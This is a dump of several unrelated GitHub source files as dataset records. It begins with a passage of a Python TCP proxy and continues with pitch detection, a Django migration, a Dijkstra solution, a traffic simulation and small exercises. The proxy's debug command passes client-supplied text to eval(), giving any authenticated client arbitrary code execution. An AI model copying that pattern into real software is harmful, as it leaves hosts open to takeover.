from_client()\".format(name)\n #assert exists impl.from_server, \"Error: `{}' filter implementation needs from_server()\".format(name)\n\n if name not in self.filter_prototypes:\n self.filter_prototypes[name] = impl\n else:\n logging.warning(\"Note: Attempted to overwrite filter type `{}' failed\".format(name))\n\n def wall(self, mesg):\n \"\"\"Warn every client with the string `mesg'.\"\"\"\n for socket in self.client_sockets:\n assert socket in self.socket_wrappers\n assert type(self.socket_wrappers[socket]) is LocalClient\n\n c = self.socket_wrappers[socket]\n c.tell_err(mesg)\n\n ###\n ### STATE: server\n ###\n\n def handle_line_server(self, socket, line):\n assert socket in self.server_sockets\n\n svr = self.socket_wrappers[socket]\n ln = line\n\n for f in svr.filters:\n try:\n ln = f.from_server(ln)\n except Exception:\n kind, value, t = sys.exc_info()\n logging.error(\"Error applying a server filter: {}\".format(repr(value)))\n logging.error(traceback.format_exc())\n\n if ln is None:\n return\n\n self.socket_wrappers[socket].handle_data(ln)\n return False # don't continue trying states\n\n def do_start_connection(self, server):\n logging.info(\"Starting to connect to server {}:{}.\".format(server.host, server.port))\n\n # This will always be ran in a thread -- to prevent long-blocking connection\n # attempts from hanging the whole program (e.g., when a server is down,\n # tinyfugue can spend quite a while waiting for a connection attempt to\n # come through...)\n\n # The main program will set connecting_in_thread synchronously *before*\n # calling this thread, so we don't need to worry about accidental multiple\n # connection attempts.\n\n # It would probably be better to try to figure out asynchronous connect() or\n # something eventually.\n\n try:\n assert type(server) 
== RemoteServer\n assert server.socket == None\n assert not server.connected\n\n rlock = False\n\n C = socket.create_connection((server.host, server.port))\n\n if server.use_SSL:\n C = self.tls_ctx_remote.wrap_socket(C)\n\n self.LOCK.acquire()\n rlock = True\n\n server.attach_socket(C)\n self.socket_wrappers[C] = server\n self.server_sockets += [C]\n self.sel.register(C, selectors.EVENT_READ)\n\n except ConnectionRefusedError:\n server.warn_all(\"Connection attempt failed: Connection refused\")\n\n except ssl.SSLError as e:\n server.warn_all(\"Connection attempt failed, SSL error: {}\".format(repr(e)))\n\n except (socket.error, socket.herror, socket.gaierror, socket.timeout) as err:\n server.warn_all(\"Connection attempt failed, network error: {}\".format(repr(err)))\n\n except OSError as err:\n server.warn_all(\"Connection attempt failed, OSError: {}\".format(repr(err)))\n\n except Exception:\n kind, value, t = sys.exc_info()\n server.warn_all(\"Connection attempt failed, other error: {}\".format(repr(value)))\n logging.error(\"NON-SOCKET CONNECTION ERROR\\n===========================\\n\\n\" + traceback.format_exc())\n\n finally:\n server.connecting_in_thread = False\n if rlock:\n self.LOCK.release()\n return\n\n def start_connection(self, server):\n assert type(server) == RemoteServer\n\n if not server.connecting_in_thread and not server.connected:\n server.connecting_in_thread = True\n t_connect = threading.Thread(target = self.do_start_connection, args = [server])\n t_connect.start()\n return True\n else:\n return False\n\n ###\n ### STATE: unauthenticated client\n ###\n\n def handle_line_auth(self, socket, line):\n assert socket in self.unauthenticated_sockets\n\n s = line.as_str().replace('\\r\\n', '').replace('\\n', '')\n\n if self.password.verify(s):\n if cfg.get(\"warn_about_connections\", True):\n self.wall(\"A client has authorized itself.\")\n\n while socket in self.unauthenticated_sockets:\n self.unauthenticated_sockets.remove(socket)\n\n self.client_sockets.append(socket)\n\n else:\n c = self.socket_wrappers[socket]\n c.tell_err(\"Incorrect.\")\n\n return True # stop the main loop from going on to state n+1\n\n\n ###\n ### STATE: client\n ###\n\n def handle_line_client(self, socket, line):\n assert socket in self.client_sockets\n\n c = self.socket_wrappers[socket]\n\n ln = line\n for f in c.filters:\n try:\n ln = f.from_client(ln)\n except Exception:\n kind, value, t = sys.exc_info()\n logging.error(\"Error applying a client filter: {}\".format(repr(value)))\n logging.error(traceback.format_exc())\n\n if ln is None:\n return\n\n s = ln.as_str().replace('\\r\\n', '').replace('\\n', '')\n\n if s[:len(COMMAND_PREFIX)] == COMMAND_PREFIX:\n try:\n if ' ' in s:\n cmd = s[len(COMMAND_PREFIX):s.index(' ')]\n args = s[s.index(' ')+1:]\n else:\n cmd = s[len(COMMAND_PREFIX):]\n args = ''\n\n if cmd in self.client_commands:\n self.client_commands[cmd](args, c)\n else:\n c.tell_err(\"Command `{}' not found.\".format(cmd))\n\n except Exception:\n kind, value, t = sys.exc_info()\n c.tell_err(\"Error during command processing: {}\".format(repr(value)))\n logging.error(\"COMMAND PROCESSING ERROR\\n========================\\n\\n\" + traceback.format_exc())\n\n else:\n c.handle_data(ln)\n\n return False # don't continue trying states\n\n def do_client_join(self, args, client):\n \"\"\"Start listening to a server.\"\"\"\n assert type(client) == LocalClient\n\n if args in self.servers:\n if client.subscribedTo is not None:\n client.unsubscribe()\n self.servers[args].subscribe(client)\n
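# Subscription is recorded on both sides: the server keeps a list of its listening clients and the client remembers the single server it is joined to.\n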
client.subscribe(self.servers[args])\n client.tell_ok(\"Subscribed to server `{}'.\".format(args))\n return True\n else:\n client.tell_err(\"No such server `{}'.\".format(args))\n return False\n\n def do_client_connect(self, args, client):\n \"\"\"Start listening to a server and initiate a connection to it.\"\"\"\n assert type(client) == LocalClient\n\n if self.do_client_join(args, client):\n self.start_connection(self.servers[args])\n return True #(ish)\n else:\n return False\n\n def do_client_drop(self, args, client):\n \"\"\"Stop listening to the server, but without actually closing the connection to it.\"\"\"\n assert type(client) == LocalClient\n\n try:\n client.unsubscribe()\n client.tell_ok(\"Stopped listening.\")\n except ValueError:\n client.tell_err(\"Couldn't stop listening to this; it may be silent already.\")\n\n def do_client_debug(self, args, client):\n \"\"\"Supply a Python expression to eval() for debugging purposes.\"\"\"\n assert type(client) == LocalClient\n\n try:\n client.tell_ok(repr(eval(args)))\n except Exception:\n kind, value, t = sys.exc_info()\n client.tell_err(repr(value))\n\n def do_client_help(self, args, client):\n \"\"\"Get help.\"\"\"\n assert type(client) == LocalClient\n\n # Commands can have multiple names, so we collect them in a dictionary ordered by\n # the function they call so that we don't end up displaying the same bit of help\n # many times.\n cmds = {}\n\n for cmd, fn in self.client_commands.items(): # (k, v)\n if fn in cmds:\n cmds[fn].append(cmd)\n else:\n cmds[fn] = [cmd]\n\n for fn, names in cmds.items(): # (k, v)\n client.tell_ok(\"{}: {}\".format(', '.join(names), fn.__doc__ or \"No documentation provided.\"))\n\n def do_client_stop_everything(self, args, client):\n \"\"\"Stop the proxy.\"\"\"\n # This is kind of stupid, isn't it?\n raise KeyboardInterrupt()\n\n ###\n ### MAIN LOOP\n ###\n\n def run(self):\n # I'm not sure how much sense it makes to do this here and not in __init__ but oh well.\n for name, proto in self.cfg['servers'].items(): # (k, v)\n self.servers[name] = RemoteServer(proto['host'], proto['port'], name)\n\n if 'encoding' in proto:\n self.servers[name].encoding = proto['encoding']\n if 'ssl' in proto and proto['ssl'] is True:\n self.servers[name].use_SSL = True\n\n server_filters = self.cfg.get('filter_servers', [])\n try:\n self.servers[name].add_filters(server_filters, self.filter_prototypes)\n self.servers[name].add_filters(proto.get('filters', []), self.filter_prototypes)\n except FilterSpecificationError as e:\n logging.error(\"Error while setting up filters: {}\".format(str(e)))\n\n client_filters = self.cfg.get('filter_clients', [])\n\n try:\n def do_accept(socket, mask):\n logging.info(\"Accepting new client...\")\n\n # When SSL is turned on, this can block waiting for the client to send an SSL handshake.\n # Maybe consider running it in a thread, too? (That's a lot of threading though. 
And\n # clients are more under our control than remote servers are.)\n try:\n connection, address = socket.accept() # and hope it works\n except ssl.SSLError as e:\n logging.error(\"SSL error in do_accept(): {}\".format(e))\n return\n except Exception:\n kind, val, tb = sys.exc_info()\n logging.error(\"Error in do_accept(): {}\".format(val))\n return\n\n logging.info(\"Accepted {} from {} (mask={}).\".format(repr(connection), repr(address), repr(mask)))\n\n if cfg.get(\"warn_about_connections\", True):\n self.wall(\"A client has connected from {}.\".format(repr(address)))\n\n self.socket_wrappers[connection] = LocalClient(connection)\n self.unauthenticated_sockets += [connection]\n self.sel.register(connection, selectors.EVENT_READ)\n\n try:\n self.socket_wrappers[connection].add_filters(client_filters, self.filter_prototypes)\n except FilterSpecificationError as e:\n self.socket_wrappers[connection].tell_err(\"Error setting up client filters: {}\".format(str(e)))\n\n server = socket.socket()\n server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n bind_to_host = self.cfg.get(\"bind_to_host\", BIND_TO_HOST)\n bind_to_port = self.cfg.get(\"bind_to_port\", BIND_TO_PORT)\n if type(bind_to_host) != str:\n logging.error(\"Error: host to bind to must be a string\")\n return\n if type(bind_to_port) != int:\n logging.error(\"Error: port to bind to must be an integer\")\n return\n server.bind((bind_to_host, bind_to_port))\n\n server = self.tls_ctx_local.wrap_socket(server, server_side=True)\n\n server.listen(100)\n server.setblocking(False)\n self.sel.register(server, selectors.EVENT_READ)\n\n logging.info(\"Listening.\")\n\n while True:\n events = self.sel.select(timeout = 1)\n\n self.LOCK.acquire()\n\n for key, mask in events:\n s = key.fileobj\n if s == server:\n do_accept(s, mask)\n else:\n if s in self.socket_wrappers:\n ss = self.socket_wrappers[s]\n else:\n raise Exception(\"Read on unregistered socket\")\n break\n\n (lines, eof) = ss.read()\n\n if eof:\n self.sel.unregister(s)\n ss.handle_disconnect()\n for state in self.states:\n if s in state[0]:\n del state[0][state[0].index(s)]\n if s in self.socket_wrappers:\n del self.socket_wrappers[s]\n\n for line in lines:\n for state in self.states:\n if s in state[0]:\n result = state[1](s, line)\n if result:\n break # to next line\n\n self.LOCK.release()\n\n except KeyboardInterrupt:\n logging.info(\"Caught KeyboardInterrupt; quitting...\")\n\n\n###\n### STARTUP / initialization\n###\n\nif __name__ == '__main__':\n cfg = load_json(CONFIG_FILE)\n\n if cfg is None:\n logging.error(\"Must have configuration\")\n exit(1)\n\n proxy = Proxy(cfg)\n\n pluginDir = cfg.get('plugin_directory', \"plugins\")\n plugin_err_fatal = cfg.get('plugin_errors_fatal', True)\n\n plugins = {}\n for P in pkgutil.iter_modules([pluginDir]):\n try:\n plugin = P.name\n m = importlib.import_module(\"{}.{}\".format(pluginDir, plugin))\n m.setup(proxy)\n plugins[plugin] = m\n logging.info(\"Loaded plugin {}\".format(plugin))\n except Exception:\n kind, value, tb = sys.exc_info()\n logging.error(\"Error loading plugin {}: {}\".format(plugin, repr(value)))\n #print(\"-------------------- TRACEBACK:\")\n #print(traceback.format_exc())\n if plugin_err_fatal:\n raise value\n\n try:\n proxy.run()\n\n except Exception:\n kind, value, t 
= sys.exc_info()\n logging.error(\"Error unloading plugins: {}\".format(repr(value)))\n traceback.print_exc()\n","repo_name":"autumn-birds/tcphydra-python","sub_path":"core/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":32971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34674429500","text":"import numpy as np\nfrom scipy.signal import argrelmax\nimport time\n\n\n##this file contains various functions\n##for calculating main lobe pitch from a block of audio\n\n\ndef getf0(block, fs):\n #max of fourier\n fourier = abs(np.fft.fft(block, n=len(block),axis=0))[:int(len(block)/2)]\n freqs = np.fft.fftfreq(len(fourier), 1/fs)\n pitch = freqs[np.argmax(fourier)]\n return pitch\n\ndef zerocrossings(block, fs):\n #count number of times signal changes sign\n zero_crossings = np.nonzero(np.diff(np.sign(block)))[0]\n pitch = len(zero_crossings)/len(block)*fs/2\n return pitch\n \ndef autocorrelation(prevblock, block, fs):\n #standard autocorrelation implementation\n autoc = np.correlate(np.concatenate((prevblock,block)).ravel(),\\\n prevblock.ravel(),\\\n mode='valid')\n\n return autoc\n\ndef fastautoc(block, fs):\n #fast autocorrelation trick\n fourier = np.fft.fft(block, n=len(block),axis=0).ravel()\n autoc = np.fft.ifft(np.multiply(fourier,np.conjugate(fourier)),n=len(block),axis=0)\n f = findfreq(autoc, fs)\n return f\n\ndef findfreq(autoc, fs):\n #find main lobe from autocorrelation block\n maxima = argrelmax(autoc[:int(len(autoc)/2)])\n if not autoc.size:\n return 1\n if not maxima:\n return 1\n if not autoc[maxima].any():\n return 1\n peak = maxima[0][np.argmax(autoc[maxima])]\n f = (fs/peak)\n return f\n\ndef avgdiff(prevblock, block):\n n = len(block)\n twoblock = np.append(prevblock, block)\n diff = np.zeros(n)\n for t in range(n):\n for i in range(n):\n diff[t] += np.square(prevblock[i] - twoblock[i + t])\n return diff\n\n\ndef cmnd(prevblock, block):\n #cumulative mean normalized difference function\n start = time.time()\n n = len(block)\n diff = avgdiff(prevblock, block)\n nordiff = np.zeros(n)\n nordiff[0] = 1\n for t in range(1, n):\n nordiff[t] = np.divide(diff[t], np.sum(nordiff)/t)\n print(time.time() - start)\n return nordiff\n \n","repo_name":"omarshayan/tuner","sub_path":"flaskr/pitch_detection.py","file_name":"pitch_detection.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72994677289","text":"from ...synthdefs import SynthDefBuilder\nfrom ...ugens import Out, SinOsc\n\n\ndef _build_synthdef():\n with SynthDefBuilder(amplitude=0, bus=0, frequency=440) as builder:\n Out.ar(\n bus=builder[\"bus\"],\n source=SinOsc.ar(frequency=builder[\"frequency\"]) * builder[\"amplitude\"],\n )\n return builder.build(name=\"simple_sine\")\n\n\nsimple_sine = _build_synthdef()\n\n\n__all__ = [\"simple_sine\"]\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/assets/synthdefs/simple_sine.py","file_name":"simple_sine.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"} +{"seq_id":"73966882088","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sms', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='messagedetails',\n name='message',\n 
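# default=None with null=True and blank=True makes the message content optional at both the database and validation level.\n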
\ndef findfreq(autoc, fs):\n    #find main lobe from autocorrelation block\n    if not autoc.size:\n        return 1\n    maxima = argrelmax(autoc[:int(len(autoc)/2)])\n    #argrelmax returns a tuple of index arrays, so test the array inside it\n    if not maxima[0].size:\n        return 1\n    if not autoc[maxima].any():\n        return 1\n    peak = maxima[0][np.argmax(autoc[maxima])]\n    f = (fs/peak)\n    return f\n\ndef avgdiff(prevblock, block):\n    n = len(block)\n    twoblock = np.append(prevblock, block)\n    diff = np.zeros(n)\n    for t in range(n):\n        for i in range(n):\n            diff[t] += np.square(prevblock[i] - twoblock[i + t])\n    return diff\n\n\ndef cmnd(prevblock, block):\n    #cumulative mean normalized difference function (as in the YIN method):\n    #divide d(t) by the cumulative mean of d(1..t)\n    start = time.time()\n    n = len(block)\n    diff = avgdiff(prevblock, block)\n    nordiff = np.zeros(n)\n    nordiff[0] = 1\n    for t in range(1, n):\n        nordiff[t] = np.divide(diff[t], np.sum(diff[1:t + 1])/t)\n    print(time.time() - start)\n    return nordiff\n    \n","repo_name":"omarshayan/tuner","sub_path":"flaskr/pitch_detection.py","file_name":"pitch_detection.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72994677289","text":"from ...synthdefs import SynthDefBuilder\nfrom ...ugens import Out, SinOsc\n\n\ndef _build_synthdef():\n    with SynthDefBuilder(amplitude=0, bus=0, frequency=440) as builder:\n        Out.ar(\n            bus=builder[\"bus\"],\n            source=SinOsc.ar(frequency=builder[\"frequency\"]) * builder[\"amplitude\"],\n        )\n    return builder.build(name=\"simple_sine\")\n\n\nsimple_sine = _build_synthdef()\n\n\n__all__ = [\"simple_sine\"]\n","repo_name":"josiah-wolf-oberholtzer/supriya","sub_path":"supriya/assets/synthdefs/simple_sine.py","file_name":"simple_sine.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":224,"dataset":"github-code","pt":"53"}
+{"seq_id":"73966882088","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('sms', '0001_initial'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='messagedetails',\n            name='message',\n            field=models.TextField(default=None, null=True, verbose_name='Message Content', blank=True),\n            preserve_default=True,\n        ),\n    ]\n","repo_name":"vamshedhar/smschannel-api","sub_path":"sms/migrations/0002_messagedetails_message.py","file_name":"0002_messagedetails_message.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"31652354378","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# time spent: planning ? min / implementation ? min / debugging ? min\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\nimport sys\nread = sys.stdin.read\nreadline = sys.stdin.readline\nreadlines = sys.stdin.readlines\n\nn,m = map(int,readline().split())\nx = list(map(int,readline().split()))\ns = readline().split()[0]\nabc = list(map(int,read().split()))\n\nimport heapq\ndef dijkstra(links, start, n):\n    inf = 10**18\n    d = [inf] * (n)\n    d[start] = 0\n    hq = []\n    # pack (cost, node) into a single int as cost*inf + node so the heap\n    # compares plain integers instead of tuples\n    for cost,i in links[start]:\n        heapq.heappush(hq, cost*inf + i)\n    while(hq):\n        num = heapq.heappop(hq)\n        cost = num//inf\n        i = num%inf\n        if( d[i] != inf):\n            continue\n        d[i] = cost\n        for tmp in links[i]:\n            cost_next, j = tmp\n            if(d[j] == inf):\n                heapq.heappush(hq, inf*(cost+cost_next)+j )\n    return d\n\nn2 = n + 4\nlinks = [[] for _ in range(n2)]\n\nit = iter(abc)\nfor a,b,c in zip(it,it,it):\n    links[a].append((c,b))\n    links[b].append((c,a))\n\nfor i,si in enumerate(s,1):\n    if(si=='A'):\n        links[i].append((x[0], n+2))\n        links[i].append((x[1], n+3))\n        links[n+1].append((0, i))\n    elif(si=='B'):\n        links[i].append((x[0], n+1))\n        links[i].append((x[2], n+3))\n        links[n+2].append((0, i))\n    else:\n        links[i].append((x[1], n+1))\n        links[i].append((x[2], n+2))\n        links[n+3].append((0, i))\n\nd = dijkstra(links, 1, n2)\nprint(d[n])","repo_name":"komajun365/competitive_programming","sub_path":"past/past202010-open/j/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74271642729","text":"# Now rework our wheel, wiper and interior methods into new ones:\n# replace one wheel or several,\n# replace one wiper or several,\n# replace one seat in the interior or several.\n# Also write a method that takes a list of keyword arguments with new values\n# and calls the setters for them.\n# For example, if it receives a motor and a gearbox, replace the existing motor with the new one and the gearbox too.\n
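\n# A minimal sketch (not present in the original file) of the setter-dispatch\n# method the header asks for; inside Auto it could look like:\n#     def update_params(self, **kwargs):\n#         # e.g. update_params(motor=new_motor, transmission=new_transmission)\n#         for name, value in kwargs.items():\n#             setter = getattr(self, 'set_' + name, None)\n#             if callable(setter):\n#                 setter(value)\n\n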
class Auto:\n    # note: mutable default arguments (lists) are shared between instances\n    def __init__(self, color=\"red\", model=\"BMW\", speed=200, wheels=[17, 17, 19, 19],\n                 wipers=['left', 'broken'], seats=['d', 'p', 'p', 'p', 'p'], motor=\"V8\",\n                 win=0, transmission=\"automatic\"):\n        self.color = color\n        self.model = model\n        self.speed = speed\n        self.wheels = wheels\n        self.wipers = wipers\n        self.seats = seats\n\n        self._motor = motor\n        self._win = win\n        self._transmission = transmission\n\n    def change_color(self, new_color):\n        self.color = new_color\n        print(\"Color is successfully changed\")\n\n    def change_speed(self, new_speed):\n        self.speed = new_speed\n        print(\"Maximum speed is successfully changed\")\n\n    def change_model(self, new_model):\n        self.model = new_model\n        print(\"Model is successfully changed\")\n\n    def change_wheel(self, new_wheel, number):\n        self.wheels[number] = new_wheel\n        print(f'Wheel #{number + 1} is successfully changed')\n\n    def change_wiper(self, new_wiper, number):\n        self.wipers[number] = new_wiper\n        print(f'Wiper #{number + 1} is successfully changed')\n\n    def change_seat(self, new_seat, number):\n        self.seats[number] = new_seat\n        print(f'Seat #{number + 1} is successfully changed')\n\n    def get_motor(self):\n        return self._motor\n\n    def set_motor(self, new_motor):\n        self._motor = new_motor\n\n    def get_win(self):\n        return self._win\n\n    def set_win(self, new_win):\n        self._win = new_win\n\n    def get_transmission(self):\n        return self._transmission\n\n    def set_transmission(self, new_transmission):\n        self._transmission = new_transmission\n\n    def tell(self):\n        print(f'Car is {self}')\n        print(f'Color is {self.color}')\n        print(f'Model is {self.model}')\n        print(f'Maximum speed is {self.speed}')\n        print(f'Wheels formula is {self.wheels}')\n        print(f'Wipers formula is {self.wipers}')\n        print(f'Seats formula is {self.seats}')\n        print(f'Motor is {self.get_motor()}')\n        print(f'Win number is {self.get_win()}')\n        print(f'Transmission is {self.get_transmission()}')\n\n\nmy_auto_1 = Auto()\nmy_auto_2 = Auto()\nmy_auto_1.tell()\n\nnew_color = \"yellow\"\nnew_model = \"Jeep\"\nnew_speed = 180\nnew_motor = \"V6\"\nnew_win = 1\nnew_transmission = \"robot\"\nnew_wheel = 19\nnew_wiper = \"right\"\nnew_seat = 'p+'\n\nmy_auto_2.change_color(new_color)\nmy_auto_2.change_model(new_model)\nmy_auto_2.change_speed(new_speed)\n\nmy_auto_2.change_wheel(new_wheel, 0)\nmy_auto_2.change_wheel(new_wheel, 1)\nmy_auto_2.change_wiper(new_wiper, 1)\nmy_auto_2.change_seat(new_seat, 1)\n\nmy_auto_2.set_motor(new_motor)\nmy_auto_2.set_win(new_win)\nmy_auto_2.set_transmission(new_transmission)\n\nmy_auto_2.tell()\n","repo_name":"RBVV23/PythonForKids","sub_path":"Unit 1 - Programming/Lesson_4/Task_2.py","file_name":"Task_2.py","file_ext":"py","file_size_in_byte":3571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37351420619","text":"import agentpy as ap\nfrom semaforo_c import SemaforoCarro\nfrom semaforo_p import SemaforoPeaton\nfrom carro import Carro\n\n# For timing\nimport time\nt = 0\nelapsed_time = 0\n\n# Import JSON\nimport json\n# Positions in JSON format\nsteps = []\njsonFile = {}\ncurrentPos = {}\n\nclass StreetModel(ap.Model):\n\n    def setup(self):\n\n        # Arrays for the traffic light positions\n        semaforos_carros = []\n        semaforos_peatones = []\n\n        # Switching time of the traffic lights\n        self.tiempo = self.p.tiempo\n\n        \"\"\" Initialize the agents \"\"\"\n        self.n_carros = self.p.carros\n        self.carros = ap.AgentList(self, self.n_carros, Carro)\n\n        n_semaforo_carros = self.p.semaforo_carros\n        self.semaforo_carros = ap.AgentList(self, n_semaforo_carros, SemaforoCarro)\n\n        n_semaforo_peatones = self.p.semaforo_peatones\n        self.semaforo_peatones = ap.AgentList(self, n_semaforo_peatones, SemaforoPeaton)\n\n        \"\"\" Create the intersection grid \"\"\"\n        size = self.p.size\n        self.cruce = ap.Grid(self, [size] * 2, track_empty = True)\n\n        \"\"\" Add the Carro agents \"\"\"\n        # Define the agents' positions inside the grid\n        self.cruce.add_agents(self.carros, [\n            (-3, -95), \n            (3, -95),\n            (-3, -120),\n            (3, -142),\n            (-3, -145),\n            (3, -172),\n            (95, 3),\n            (95, -3),\n            (110, -3),\n            (136, 3),\n            (152, -3)\n        ])\n        # Define the cars' positions to send them to Unity\n        # To move forward: [0 - 5] -> z++, [6 - 10] -> x++\n        # -3 -120\n        x_carro = [-3, 3, -3, 3, -3, 3, 95, 95, 110, 136, 152]\n        z_carro = [-95, -95, -120, -142, -145, -172, 3, -3, -3, 3, -3]\n        for i in range(self.n_carros):\n            self.carros[i].x = x_carro[i]\n            self.carros[i].y = 0\n            self.carros[i].z = z_carro[i]\n\n\n        \"\"\" Add the traffic light agents \"\"\"\n        # Assign them to specific positions on the grid\n        self.cruce.add_agents(self.semaforo_carros, [\n            (-7, 7),\n            (7, -7)\n        ])\n        # Set one of the traffic lights to stopped, i.e. red\n        self.semaforo_carros[0].status = 0\n\n        self.cruce.add_agents(self.semaforo_peatones, [\n            (-6, -7),\n            (6, 7)\n        ])\n        # Define the traffic light positions to send them to Unity\n        x_semaforo_carro = [-7, 7]\n        z_semaforo_carro = [7, -7]\n        x_semaforo_peatones = [-6, 6]\n        z_semaforo_peatones = [-7, 7]\n\n        # Add the car traffic light positions\n        for i in range(n_semaforo_carros):\n            self.semaforo_carros[i].x = x_semaforo_carro[i]\n            self.semaforo_carros[i].y = 0\n            self.semaforo_carros[i].z = z_semaforo_carro[i]\n\n            semaforo = {\n                \"x\" : x_semaforo_carro[i],\n                \"y\" : 0,\n                \"z\" : z_semaforo_carro[i]\n            }\n            semaforos_carros.append(semaforo)\n\n        # Add the pedestrian traffic light positions\n        for i in range(n_semaforo_peatones):\n            self.semaforo_peatones[i].x = x_semaforo_peatones[i]\n            self.semaforo_peatones[i].y = 0\n            self.semaforo_peatones[i].z = z_semaforo_peatones[i]\n\n            semaforo = {\n                \"x\" : x_semaforo_peatones[i],\n                \"y\" : 0,\n                \"z\" : z_semaforo_peatones[i]\n            }\n            semaforos_peatones.append(semaforo)\n\n\n        step = {\n            \"semaforos_carros\": semaforos_carros,\n            \"semaforos_peatones\": semaforos_peatones\n        }\n        stepInicial = {\n            \"posicion_inicial\": step\n        }\n        jsonFile.update(stepInicial)\n
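\n        # For reference, the file written in end() then has roughly this shape\n        # (illustrative only):\n        # {\n        #   \"posicion_inicial\": {\"semaforos_carros\": [...], \"semaforos_peatones\": [...]},\n        #   \"steps\": [{\"carros\": [...], \"semaforos_carros\": [...]}, ...]\n        # }\n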
\n    def step(self): \n        # Bring in the timing variables\n        global t\n        global elapsed_time\n        if (t == 0):\n            # Start the seconds counter as soon as the steps begin\n            t = time.time()\n\n        # Each step has one array of cars and one of traffic lights\n        carros = []\n        semaforos_carros = []\n\n        # Cars advance until they are close to the traffic light\n        for i in range(self.n_carros):\n            # Z AXIS\n            if (i < 6):\n                # If it is before or past the intersection, keep moving\n                if (self.carros[i].z < -18):\n                    self.carros[i].move_up(0.5)\n                \n                elif (self.carros[i].z > -12):\n                    self.carros[i].move_up(1)\n\n                # If the light is green, it may keep advancing\n                elif (self.semaforo_carros[0].status == 1):\n                    self.carros[i].move_up(0.5)\n            \n            # X AXIS\n            else:\n                if (self.carros[i].x > 18):\n                    self.carros[i].move_left(0.5)\n\n                elif (self.carros[i].x < 12):\n                    self.carros[i].move_left(1)\n\n                elif (self.semaforo_carros[1].status == 1):\n                    self.carros[i].move_left(0.5)\n            \n\n        # Record the cars' current positions as JSON\n        for i in range(self.n_carros):\n            carro = {\n                \"x\": self.carros[i].x,\n                \"y\": self.carros[i].y,\n                \"z\": self.carros[i].z\n            }\n            carros.append(carro)\n        for i in range(2):\n            semaforo = {\n                \"estado\": self.semaforo_carros[i].status\n            }\n            semaforos_carros.append(semaforo)\n\n\n        # Check how much time has passed #\n        elapsed_time = time.time() - t\n
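\n        # Note: switching is driven by wall-clock time rather than step count,\n        # so light timing depends on how fast the simulation actually runs.\n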
\n        # After a certain number of seconds the lights switch state\n        if (elapsed_time > self.tiempo):\n            # Reset the counter to zero to start the interval again\n            t = time.time()\n\n            if (self.semaforo_carros[0].status == 1):\n                self.semaforo_carros[0].status = 0\n                self.semaforo_carros[1].status = 1\n            else:\n                self.semaforo_carros[0].status = 1\n                self.semaforo_carros[1].status = 0\n\n        # Add the positions and states to the JSON\n        step = {\n            \"carros\": carros,\n            \"semaforos_carros\": semaforos_carros\n        }\n        steps.append(step)\n    \n    \n    \n    def end(self):\n        steps_json = {\n            \"steps\": steps\n        }\n        jsonFile.update(steps_json)\n        self.report('ended', 1) \n\n    \nparameters = {\n    'tiempo': 3, # Duration of each traffic light phase\n    'carros': 11, # number of Carro agents\n    'semaforo_peatones': 2, # number of pedestrian traffic light agents\n    'semaforo_carros': 2, # number of car traffic light agents\n    'size': 300, # width and height of the grid\n    'steps': 600, # iterations\n    'seed': 40,\n}\n\nmodel = StreetModel(parameters)\nresults = model.run()\nprint(results)\n\n# Save the JSON to a file\njson_object = json.dumps(jsonFile, indent = 4)\nwith open(\"positions.json\", \"w\") as outfile:\n    outfile.write(json_object)","repo_name":"ErikJs001/Proyecto-MultiAgentes","sub_path":"StreetModel.py","file_name":"StreetModel.py","file_ext":"py","file_size_in_byte":7072,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"1025208698","text":"a, b = input().split()\nx, y = int(a), int(b)\nl1 = x\nl2 = y\nr = 0\n\n# Euclid's algorithm: x ends up as gcd(l1, l2), the largest square tile side\nwhile y != 0:\n    r = x % y\n    x = y\n    y = r\n\nprint(\"number of tiles: \", ((l1 * l2) / (x * x)))\nprint(\"tile size: \", x)","repo_name":"st-lu/University","sub_path":"Programming algorithms - Python/lab1/p3 lab1.py","file_name":"p3 lab1.py","file_ext":"py","file_size_in_byte":191,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
